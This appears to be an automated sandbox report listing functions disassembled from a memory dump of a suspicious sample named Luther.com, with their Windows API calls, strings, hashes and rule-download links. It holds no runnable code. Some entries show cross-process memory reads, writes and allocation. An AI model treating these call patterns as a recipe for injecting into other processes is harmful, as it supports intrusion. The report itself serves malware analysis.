Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorLastVariant$ClearFormatInitMessage
String ID: bn
API String ID: 2854431205-2317007323
Opcode ID: 43eb61518da1c05512bfc4c4850cb161ef9dff3c34a240076e5aa9cd0f66f2a1
Instruction ID: ef00479cd55136ddbc7f80fd10ccd38ad87884214969d2ef7c76f5cf50c244fb
Opcode Fuzzy Hash: 43eb61518da1c05512bfc4c4850cb161ef9dff3c34a240076e5aa9cd0f66f2a1
Instruction Fuzzy Hash: 88D127B19006499FCB14DF94C895BEEBBB4FF08304F54906DE416BB292DB71AA86CF50

Function 00EB61A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 00EB623D
_wcslen.LIBCMT ref: 00EB6249

Strings

bn, xrefs: 00EB61B1, 00EB62E1
CALLARGARRAY, xrefs: 00EB6243, 00EB6248

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY$bn
API String ID: 157775604-1875210186
Opcode ID: 04a9caff4b8603ec9ee265a8ac5b980c34ca27a175563be3dd3680c9127d6f1a
Instruction ID: acface37cd02af96642e366834bfa5e2e9b2cbc2e034ee45cd04f7e9a8439448
Opcode Fuzzy Hash: 04a9caff4b8603ec9ee265a8ac5b980c34ca27a175563be3dd3680c9127d6f1a
Instruction Fuzzy Hash: 2541BE71A002099FDF04DFA8C8869EEBBF5FF58364F106069E506B7261E7759D81CB90

Function 00E93063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E9BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E92B1D,?,?,00000034,00000800,?,00000034), ref: 00E9BDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E930AD

Part of subcall function 00E9BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E92B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00E9BDBF

Part of subcall function 00E9BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00E9BD1C
Part of subcall function 00E9BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E92AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E9BD2C
Part of subcall function 00E9BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E92AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E9BD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E9311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E93167

Strings

@, xrefs: 00E9317F

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: f3593b842c12067dbab9dbd66f612720bd91fee916069221ccdd70bb2c8843fb
Instruction ID: 318bcc0b2f6967c3ee012c4e9fd5f583130efe6ea63cbd12f1facddea31ab698
Opcode Fuzzy Hash: f3593b842c12067dbab9dbd66f612720bd91fee916069221ccdd70bb2c8843fb
Instruction Fuzzy Hash: CF413772901218BEDF11DBA4CD85EEEBBB8EF49304F0050A5FA45B7190DA716F89CB60

Function 00E61A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\224553\Luther.com,00000104), ref: 00E61AD9
_free.LIBCMT ref: 00E61BA4
_free.LIBCMT ref: 00E61BAE

Strings

C:\Users\user\AppData\Local\Temp\224553\Luther.com, xrefs: 00E61AD0, 00E61AD7, 00E61B06, 00E61B3E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\224553\Luther.com
API String ID: 2506810119-3678037166
Opcode ID: 8d24c12ad8b79f6083010a58e670a82f90e328e249f0732850b57ed4f89a9435
Instruction ID: 37524cc532ccf0a8ea5dfee815125657ff26d190076fdd59d6ae9dfa09833388
Opcode Fuzzy Hash: 8d24c12ad8b79f6083010a58e670a82f90e328e249f0732850b57ed4f89a9435
Instruction Fuzzy Hash: 32317571A80218EFDB22DF99EC85D9EBBFCEB85794B1451E6E804A7211E6704E40D790

Function 00E9CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E9CBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 00E9CBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F029C0,01085C68), ref: 00E9CC40

Strings

0, xrefs: 00E9CB8A

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 3f8d02b236fee66fa6e7410d1f5e8bda646fb02db84b9f5cd2fefe80c41ea125
Instruction ID: b3a9dde4a9de315b105d46c8427424865b61b7381a01923bb1e71e582d2f35cc
Opcode Fuzzy Hash: 3f8d02b236fee66fa6e7410d1f5e8bda646fb02db84b9f5cd2fefe80c41ea125
Instruction Fuzzy Hash: AD41B3712043029FDB20EF24D985F5ABBE4AF89718F244A2DF9A5A7291D731E904CB52

Function 00EC4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00ECDCD0,00000000,?,?,?,?), ref: 00EC4F48
GetWindowLongW.USER32 ref: 00EC4F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC4F75

Strings

SysTreeView32, xrefs: 00EC4F1A

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: cdeef67b0d49121771e79254606a5fc16c3ac48a48c92991c8c9ddd224bd6f0c
Instruction ID: e336504c8a74a72920d29cda676db0a3d8d57f0050b0999ec78d3c258a286353
Opcode Fuzzy Hash: cdeef67b0d49121771e79254606a5fc16c3ac48a48c92991c8c9ddd224bd6f0c
Instruction Fuzzy Hash: 42319071214245AFDB218E38CC55FDA7BA9EB08338F206729F975B21D0C772AC529750

Function 00EB3AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EB3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00EB3AD4,?,?), ref: 00EB3DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EB3AD7
_wcslen.LIBCMT ref: 00EB3AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00EB3B63

Strings

255.255.255.255, xrefs: 00EB3AF2, 00EB3AF7

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: ed682ae11c31895cb33f7a232a8e80ac17171563df0c455580b9657b28a4339f
Instruction ID: 13d6d640d1c855b1c541dbc26fe8ae06e2f3142fdf7107b071a82d8324b87e57
Opcode Fuzzy Hash: ed682ae11c31895cb33f7a232a8e80ac17171563df0c455580b9657b28a4339f
Instruction Fuzzy Hash: 0B31A4356002019FCB20CF78C9C6EEABBE1EF54318F249159E916AB7A6D731EE45C760

Function 00EC4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EC49DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EC49F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC4A14

Strings

SysMonthCal32, xrefs: 00EC49A7

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 40819b680e76f9f18d20291bcd2003d3cd5b8f93c6c597523bde30700fd999dd
Instruction ID: 6abb7c891f6be50a6402527584e990940e640dfc709ed0efefde8f1152bdb7f6
Opcode Fuzzy Hash: 40819b680e76f9f18d20291bcd2003d3cd5b8f93c6c597523bde30700fd999dd
Instruction Fuzzy Hash: 5F21A072500229ABDF118F50CC46FEA3BA5EB48718F111218FA157B0D0D6B2A8569B90

Function 00EC50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EC51A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EC51B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EC51B8

Strings

msctls_updown32, xrefs: 00EC5122

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 97d9e498284496b8d992759ffa7ebe68ac0cbc93491b1b2a58ddd862ca91e6c7
Instruction ID: 11b257e6db3dfff9128deb5ecb26e16bf40b8afc7bc02f4fdca9c20229e7dcd2
Opcode Fuzzy Hash: 97d9e498284496b8d992759ffa7ebe68ac0cbc93491b1b2a58ddd862ca91e6c7
Instruction Fuzzy Hash: E2218EB6601609AFDB10DF14CD85EA737EDEB59368B04105DFA00AB361CB32EC42DBA0

Function 00EC4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EC42DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EC42EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EC4312

Strings

Listbox, xrefs: 00EC42AB

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 106dc8563b28aaddce18f14b527c6216a9864d3f0483f8d2d693d1c1e14167f3
Instruction ID: 0e2a27841b668e30f4e831e791d711d9fb24f3e12a967aea3d523636fdeef060
Opcode Fuzzy Hash: 106dc8563b28aaddce18f14b527c6216a9864d3f0483f8d2d693d1c1e14167f3
Instruction Fuzzy Hash: 2921B372604218BBEF158F94CD85FAB3B6EEB89754F119129F900AB1E0C6729C52C7A0

Function 00EA5439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EA544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EA54A1
SetErrorMode.KERNEL32(00000000,?,?,00ECDCD0), ref: 00EA5515

Strings

%lu, xrefs: 00EA54B4

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 9027b2221bdd79f108a8e7ce7e189de3dfc3802f8391830b251147a9d97c1cbc
Instruction ID: 142db8cd41193ce849c2d6b885469a370c329eaf9a2f4d2952a877424df9d9ed
Opcode Fuzzy Hash: 9027b2221bdd79f108a8e7ce7e189de3dfc3802f8391830b251147a9d97c1cbc
Instruction Fuzzy Hash: 97314675A00209AFDB10DF54C985EAABBF8EF09304F1490A9F509EB262D771ED45CB61

Function 00EC4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EC4CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EC4D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EC4D0F

Strings

msctls_trackbar32, xrefs: 00EC4CC4

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: d5b4bccfeb06b1d9925b7beb2934cb75357a2cbd3017968dfc4b96b10ac277ee
Instruction ID: 4c2b0c17db65162ada6186169e0378b8bf5e9fa0bd2eba8dfca72af091986a7f
Opcode Fuzzy Hash: d5b4bccfeb06b1d9925b7beb2934cb75357a2cbd3017968dfc4b96b10ac277ee
Instruction Fuzzy Hash: 0811E7B1240248BEEF215F65CC06FAB7BE8EF85769F111529FA51F20E0C672DC519B10

Function 00E9389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A

Part of subcall function 00E936F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E93712
Part of subcall function 00E936F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E93723
Part of subcall function 00E936F4: GetCurrentThreadId.KERNEL32 ref: 00E9372A
Part of subcall function 00E936F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E93731

GetFocus.USER32 ref: 00E938C4

Part of subcall function 00E9373B: GetParent.USER32(00000000), ref: 00E93746

GetClassNameW.USER32(?,?,00000100), ref: 00E9390F
EnumChildWindows.USER32(?,00E93987), ref: 00E93937

Strings

%s%d, xrefs: 00E9394B

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: d02a9e6b3cfd408a3917ec2fb232fcc0aad5115be468da7638870469b3b95ce1
Instruction ID: 01f879b3b1e8994ea0292acefdcc791228f667cb5a3817b2c0b3c64c2803e022
Opcode Fuzzy Hash: d02a9e6b3cfd408a3917ec2fb232fcc0aad5115be468da7638870469b3b95ce1
Instruction Fuzzy Hash: F211D5B56002056BCF01BF749D85FEE77A9AF94304F009079F949BB296CE729946CB20

Function 00EC6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EC6360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EC638D
DrawMenuBar.USER32(?), ref: 00EC639C

Strings

0, xrefs: 00EC632E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 55f82bafa214361a3a3dc385111cc5b74e1965bfc3d28add828052443a75ef01
Instruction ID: 15a1e6a951ebecb0cf18d97848220a2d22210fdf0f6d1caa44df980517119278
Opcode Fuzzy Hash: 55f82bafa214361a3a3dc385111cc5b74e1965bfc3d28add828052443a75ef01
Instruction Fuzzy Hash: 6D017972504248AFDB119F55DD84FAA7BB4EB44315F1080A9E809A6151CB328A8AEF21

Function 00E8E778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00E8E797
FreeLibrary.KERNEL32 ref: 00E8E7BD

Strings

GetSystemWow64DirectoryW, xrefs: 00E8E791
X64, xrefs: 00E8E680

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 991fa7e4fcb2174a5a2aac6d3e72f0027f4aca7fea40d5248decb356f4719d57
Instruction ID: 6c10fbbc1f51f41a911bf2610a0e98fb4191426288682de638e2627b56875d02
Opcode Fuzzy Hash: 991fa7e4fcb2174a5a2aac6d3e72f0027f4aca7fea40d5248decb356f4719d57
Instruction Fuzzy Hash: 77E022B1D0A6209FD77266205C88EEA33246F20B01B292679F80EF6350EB26CC499794

Function 00E9096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ba6d32fa022360c6b5e0e26cf9b93d29aedb1f493ce691156716ee6ece2ae6
Instruction ID: 797640f3476ab2b9403919a66098adf478b9fa99074af63499b7b52d16d798c7
Opcode Fuzzy Hash: b8ba6d32fa022360c6b5e0e26cf9b93d29aedb1f493ce691156716ee6ece2ae6
Instruction Fuzzy Hash: 96C17C75A0020AEFDB14CF94C884EAEB7B5FF48708F609598E905EB251D771EE81DB90

Function 00E641F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00E6427E
__alldvrm.LIBCMT ref: 00E6447F
__alldvrm.LIBCMT ref: 00E644A1

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: 0c6121b2e700e66d827e3d0c6bb9ada01b61049c9822f198bdc289a3cfd36556
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: A0A19AB29803869FDB21DF18E8927AEBBE0EF11398F24516DE5A5BB3C1C6348D41C750

Function 00E90D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00ED0BD4,?), ref: 00E90EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00ED0BD4,?), ref: 00E90EF8
CLSIDFromProgID.OLE32(?,?,00000000,00ECDCE0,000000FF,?,00000000,00000800,00000000,?,00ED0BD4,?), ref: 00E90F1D
_memcmp.LIBVCRUNTIME ref: 00E90F3E

Memory Dump Source

